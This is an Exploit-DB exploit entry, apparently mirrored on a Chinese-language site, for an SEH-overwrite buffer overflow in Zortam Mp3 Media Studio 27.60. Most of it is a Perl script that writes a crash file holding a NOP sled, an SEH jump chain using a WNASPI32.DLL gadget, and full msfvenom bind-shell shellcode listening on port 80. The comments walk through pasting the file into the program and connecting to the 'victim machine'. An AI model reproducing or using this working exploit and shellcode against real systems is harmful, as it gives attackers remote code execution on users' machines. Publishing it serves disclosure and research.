Zortam Mp3 Media Studio 27.60 – Remote Code Execution (SEH)

• Exploit Database
• 69 阅读

• 作者： Vincent Wolterman
  日期： 2020-11-20
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/49084/

• # Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)
  # Date: November 19, 2020
  # Exploit Author: Vincent Wolterman
  # Vendor Homepage: https://www.zortam.com/index.html
  # Software Link: https://www.zortam.com/download.html
  # Version: 27.60
  # Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Professional Build 19041
  
  # Steps to reproduce crash:
  # 1) Run provided Perl code Zortam_MP3_Studio_poc.pl
  # 2) Open Zortam_Crash.txt output file
  # 3) Copy contents of text file to clipboard
  # 4) Open Zortam Mp3 Studio
  # 5) From the Menu bar -> File -> New Library
  # 6) Click ‘OK’ when prompted ‘Do you want to create a new Mp3 library?’
  # 7) Paste the contents of Zortam_Crash.txt into the ‘Select Folder’ field
  # 8) Click 'OK'
  # 9) Connect to victim machine on port 80
  
  #!/usr/bin/perl
  
  $baddata = "Metal's_Greatest_Hits"; # you can put whatever you need to here to convince victim (will be seen during crash)
  $baddata .= "\x90" x (268-length($baddata)); # exact overwrite at 272
  
  $nseh = "\xeb\x0b\x90\x90"; # nseh overwrite JMP short 11 bytes into NOP sled
  
  # 0x10015962 : pop ecx # pop esi # ret| ascii {PAGE_EXECUTE_READ} [WNASPI32.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.50
  # (C:\Program Files\Zortam Mp3 Media Studio\WNASPI32.DLL)
  
  $seh = "\x62\x59\x01\x10"; # seh overwrite
  $nop = "\x90" x 12; # NOP sled
  
  # msfvenom -p windows/shell_bind_tcp LPORT=80 -b "\x00\x0a\x0d" -f perl -v payload EXITFUNC=seh
  # Payload size: 355 bytes
  
  $payload =
  "\xd9\xcf\xbf\xad\x91\xa4\xe3\xd9\x74\x24\xf4\x5a\x29\xc9" .
  "\xb1\x53\x83\xc2\x04\x31\x7a\x13\x03\xd7\x82\x46\x16\xdb" .
  "\x4d\x04\xd9\x23\x8e\x69\x53\xc6\xbf\xa9\x07\x83\x90\x19" .
  "\x43\xc1\x1c\xd1\x01\xf1\x97\x97\x8d\xf6\x10\x1d\xe8\x39" .
  "\xa0\x0e\xc8\x58\x22\x4d\x1d\xba\x1b\x9e\x50\xbb\x5c\xc3" .
  "\x99\xe9\x35\x8f\x0c\x1d\x31\xc5\x8c\x96\x09\xcb\x94\x4b" .
  "\xd9\xea\xb5\xda\x51\xb5\x15\xdd\xb6\xcd\x1f\xc5\xdb\xe8" .
  "\xd6\x7e\x2f\x86\xe8\x56\x61\x67\x46\x97\x4d\x9a\x96\xd0" .
  "\x6a\x45\xed\x28\x89\xf8\xf6\xef\xf3\x26\x72\xeb\x54\xac" .
  "\x24\xd7\x65\x61\xb2\x9c\x6a\xce\xb0\xfa\x6e\xd1\x15\x71" .
  "\x8a\x5a\x98\x55\x1a\x18\xbf\x71\x46\xfa\xde\x20\x22\xad" .
  "\xdf\x32\x8d\x12\x7a\x39\x20\x46\xf7\x60\x2d\xab\x3a\x9a" .
  "\xad\xa3\x4d\xe9\x9f\x6c\xe6\x65\xac\xe5\x20\x72\xd3\xdf" .
  "\x95\xec\x2a\xe0\xe5\x25\xe9\xb4\xb5\x5d\xd8\xb4\x5d\x9d" .
  "\xe5\x60\xcb\x95\x40\xdb\xee\x58\x32\x8b\xae\xf2\xdb\xc1" .
  "\x20\x2d\xfb\xe9\xea\x46\x94\x17\x15\x68\x35\x91\xf3\x02" .
  "\xa5\xf7\xac\xba\x07\x2c\x65\x5d\x77\x06\xdd\xc9\x30\x40" .
  "\xda\xf6\xc0\x46\x4c\x60\x4b\x85\x48\x91\x4c\x80\xf8\xc6" .
  "\xdb\x5e\x69\xa5\x7a\x5e\xa0\x5d\x1e\xcd\x2f\x9d\x69\xee" .
  "\xe7\xca\x3e\xc0\xf1\x9e\xd2\x7b\xa8\xbc\x2e\x1d\x93\x04" .
  "\xf5\xde\x1a\x85\x78\x5a\x39\x95\x44\x63\x05\xc1\x18\x32" .
  "\xd3\xbf\xde\xec\x95\x69\x89\x43\x7c\xfd\x4c\xa8\xbf\x7b" .
  "\x51\xe5\x49\x63\xe0\x50\x0c\x9c\xcd\x34\x98\xe5\x33\xa5" .
  "\x67\x3c\xf0\xdb\x96\x8c\xed\x4c\x01\x65\x4c\x11\xb2\x50" .
  "\x93\x2c\x31\x50\x6c\xcb\x29\x11\x69\x97\xed\xca\x03\x88" .
  "\x9b\xec\xb0\xa9\x89";
  
  
  $file = "Zortam_Crash.txt";
  open (FILE, '>Zortam_Crash.txt');
  print FILE $baddata;
  print FILE $nseh;
  print FILE $seh;
  print FILE $nop;
  print FILE $payload;
  close (FILE);
  
  print "Exploit file created [" . $file . "]\n";
  print "Buffer size: " . length($baddata) . "\n";
  

  PowerShell

  Copy